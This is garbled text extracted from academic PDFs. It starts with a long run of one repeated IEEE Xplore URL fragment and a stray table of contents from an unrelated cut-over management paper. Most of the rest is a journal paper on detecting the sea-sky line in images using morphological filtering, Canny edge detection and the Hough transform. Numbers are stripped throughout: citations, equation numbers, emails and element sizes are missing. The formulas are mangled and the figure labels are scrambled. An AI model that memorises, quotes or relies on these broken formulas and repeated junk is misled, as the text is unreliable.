&url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://ieeexplore.ieee.org/xpl/articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs_all.jsp% farnumber% d http://dx.doi.org/ . /telfor. . http://dx.doi.org/ . /peerj-cs. a framework for cut-over management introduction project-specific cut-over versus release-specific rollout recommended deliverables and outcomes for the preparation of a project-specific cut-over project-planning phase design phase realization phase test phase cut-over and support phase recommended deliverables and outcomes for the preparation of a release-specific rollout the rollout handbook communication during release planning rollout change lessons-learned workshop conclusions acknowledgements references paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - the new method of sea-sky line detection based on mathematical morphology zhang wenqi school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com bai wanmin school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com yu jun school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com gao shouyi school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com abstract—to solve the problem of low accuracy and robustness of sea-sky line detection, this paper presents a method of sea- sky line detection based on the mathematical morphology. firstly, the mathematical morphology closed-open operation is used to filter and denoise the sea-sky image. then the canny operator is used to obtain the sea-sky boundary of the image, then mathematical morphological operation is used to remove some disturbing points. finally, the sea-sky line is detected by hough transform. the experimental results show that the algorithm can accurately and efficiently detect the sea-sky line under the complex sea-sky background. keywords-sea-sky line; mathematical morphology; edge detection; hough transformation i. introduction the sea-sky line is the dividing line between the sea and the sky. in general, an image of sea-sky background mainly includes three regions, those are brighter sky area, the darker sea area, and the sea-sky line area from light to dark [ ]. if the low altitude investigation is carried out, the target on the sea usually appears in the area of sea-sky line. by detecting and obtaining the sea-sky line, it can reduce the calculation amount of target detection and shorten the calculation time. at the same time, it can distinguish between the sky area and sea area, that is meaningful to the simulation experiment of target detection on the sea. the sea-sky line detection is influenced from marine environment greatly. the main influencing factors are as follows : ( ) the strong watermark interference caused by the wave, that makes the gray-value of the wave which is close to the pixel point gray-value of the sea-sky line, so that the extraction of the sea-sky line is difficult. ( ) when the background images contain mountains, ships and so on , which will interfere with the detection of sea-sky lines; ( ) when the atmospheric visibility is low, the sea-sky boundary is blurred, which leads to difficult y on detecting sea-sky line. in order to detect the sea-sky line accurately, we need to know about its characteristics as follows. ( ) the area of sea-sky line is between the sky and the sea. its brightness is more intense than the other two parts. grayscale changes strongly in vertical direction as well as varies in horizontal direction slowly. ( ) the sea-sky line is usually not a straight line but a gradual change band. at present, there are many reference documentation on sea-sky line detection. for example, liang d and others use the algorithm of otsu segmentation and clustering in order to detect the sea-sky lines[ ]. because the otsu segmentation algorithm could not accurately segment the sea-sky background images with imbalanced illumination. it makes the sea-sky line detection error in this kind of image; h. wang and others use the algorithm of combining the sobel operator with the straight line fitting to carry out the sea-sky line detection[ ]. this method can be used to extract the sea-sky line in simple background, but it is difficult to get a satisfactory extraction effect in some complicated situations. wang bo and others use the algorithm of gradient saliency region growth to detect the sea-sky lines[ ], but the sea surface splash and water wave will interfere with the image gradient calculation. for the complex images of sea conditions, these methods are limited in certain degree. in order to improve the robustness and accuracy of sea- sky line detection, the method of sea-sky line detection based on mathematical morphology is proposed. this method can improve the robustness of sea-sky line detection in the complex sea-sky background. the mathematical morphology are used to denoise sea-sky images and remove interference points, which can reduce computation and improve the accuracy of sea sky detection. international journal of advanced network, monitoring and controls volume , no. , ii. mathematical morphology the mathematical morphology is a nonlinear image processing and analysis theory. it is characterized by geometrical method, which is more suitable for the processing and analysis of visual information. the basic idea of the mathematical morphology is to measure the availability of the target image region and the effectiveness of the filling method by using a certain form of structural elements. then it extracts more essential information of the related characteristics of the image morphology ,which can achieve the purpose of the target image analysis and recognition. the mathematical morphology can eliminate the unrelated morphological and structural attributes in the target image and retain the basic nature of the morphological and structural properties to simplify the target image data, so that it has the characteristics of fast parallel speed and easy implement in hardware. the algorithm has the natural parallel structure. it realizes the parallel of morphological analysis and process, which greatly improves the speed of image analysis and process. at present, the mathematical morphology has been widely used in the fields of pattern recognition, machine vision, microscopic image analysis, medical image processing, computing and data processing and so on. it has obvious advantages in image processing problems such as filtering noise reduction, image enhancement, edge detection, image segmentation, feature extraction, texture analysis, image restoration and reconstruction, and image compression and so on. a. the.mathematical morphology operation the mathematical morphology is composed of a set of morphological algebraic operators , whose basic operations are shown as follows: expansion, erosion, opening and closing. these operations have different characteristics in binary and grayscale images [ ] . these basic operations can also be derived and combined into various practical algorithms of the mathematical morphology, which can be used to analyze and process the shape and structure of the image. the most basic morphological transformation of the mathematical morphology includes expansion and corrosion, which can achieve many functions, such as filtering noise, dividing the independent elements and bridging the adjacent elements in the target image. the mathematical morphology can also be used to find the maximum or minimum region of the obvious block in the target image and get the gradient of the target image. the expansion operation is to calculate the local maximum. while the corrosion operation is to calculate the minimum value of the pixel in the area. the two operations are a pair of mutually dual operations [ ].the expansion operation is a process to expand the edge to the outside. it can be used to fill the small holes in the target image and transform the background edge into the target edge, so that the goal is increased and the background is reduced. the corrosion operation is a process that removes the unrelated edge points and makes the edge shrink inward. it can eliminate the small bulges in the target image and reduce the target and increase the background. the other morphological operations are composed of two basic morphological transformations[ - ], such as opening and closing. the f(x, y ) is set as an input image, b(x, y)is set as a structural element. the structure element b is used to handle the input the image f(x, y ).as the formula( ) shown, this is an expansion operation. as the formula ( ) shown, this is a corrosion operation . definition the image f is expanded by using the structural element b , writed as f b .  ( , ) [ ]( , ) max{ ( , )} st b f b x y f x s y t       definition the image f is corroded by using the structural element b , writed as f b .  ( , ) [ ]( , ) min{ ( , )} st b f b x y f x s y t      based on the two basic morphological transformations of expansion and corrosion, many mathematical morphological clusters can be constructed. while open and closed operations are the two basic operations in the cluster [ - ] . the open operation firstly corrodes the image and then expands it, as shown in the formula ( ).the closed operation firstly expands the image and then corrodes it, as shown in the formula ( ). definition the image f is opened by using the structural element b , writed as f b  ( )f b f b b    definition the image f is closed by using the structural element b, writed as f b  ( )f b f b b     as shown in fig. , the fig.(a) is a square structural element, whose size is . the fig.(b) is the objective matrix that we want to perform the mathematical morphology operations. the fig.(c) is the result diagram of the corrosion operation. we use the structural elements that is shown in the fig.(a) to handle the target matrix of the fig.(b). the fig.(d) is the result graph of the expansion operation that we use the structural elements that is shown in the fig.(a) to handle the target matrix of the fig.(b). international journal of advanced network, monitoring and controls volume , no. , (a)structural (b)matrix (c)corrosion operation (d)expansion operation elements figure . the mathematical morphology operation the open operation can remove isolated points, burrs and small bridges (that is, the small points connected to two blocks), which can be used to segment large areas and smooth the edges of large area. while the total position and shape are constant. the closed operation can fill the small holes in the object and achieve the purpose of stitching small cracks to connect the adjacent objects and smooth edges .while the total position and shape are constant. the open operation and closed operation are also a pair of dual operations. the closed operation can be filled with low grayscale black holes. and the open operation will inhibit the white point( noise) with high gray value. the operation that the closed operation is performed firstly ,followed that the open operation is used to make the de-noising effect better and smooth edge. therefore, the closed - open operation are choosen in the this article to filter and reduce the noise of the sky-sea images. b. selection of structural elements in any condition, the mathematical morphology algorithm is composed of two basic problems: mathematical morphology operation and structural element selection. the definition of mathematical morphology makes the operation rules of mathematical morphology constant. therefore, the selection of morphological and structural elements determines the purpose and effect of mathematical morphology algorithm. throughout, the determination and optimization of structural elements have become hot topics and difficulties in the study of the mathematical morphology. the choice of the morphological structure elements can be divided into two aspects: the size and the shape of the structural elements. generally speaking, the structural elements must be geometrically simpler than the original image. and they are bounded; besides, the convexity of structural elements is also important. based on the selection principle of structural elements, we usually choose some small simple collections, such as square, diamond, circle and so on. as shown in the fig. , there are some examples of structural elements.                                 (b)the linear (b)the rhombic structural elements structure element                                 (c)the rectangular (d)the square structural elements structural elements figure . the structural elements if the structural elements are not properly selected, they can not effectively process pictures. and the result will not have the desired effect. that mainly include the following two conditions.( ) when the size of the selected structure element is too small, the open operation cannot effectively eliminate the larger high grayscale noise point; for larger, low-gray black holes, that cannot be effectively bridged by the closed calculations. ( ) when the size of the selected structure element is too large, on the one hand, the open operations will excessively eliminate pixel points on the edges of the image and cause false breaks. on the other hand, the closed operations will over-combine black holes and generate interference information [ - ] . therefore, the use of single size structure elements can easily lead to the edge location of the target image is not accurate enough and the denoising effect is not ideal. in international journal of advanced network, monitoring and controls volume , no. , addition, due to the existence of a constraint relation on the edge of the image, the noise of the image is generated randomly. 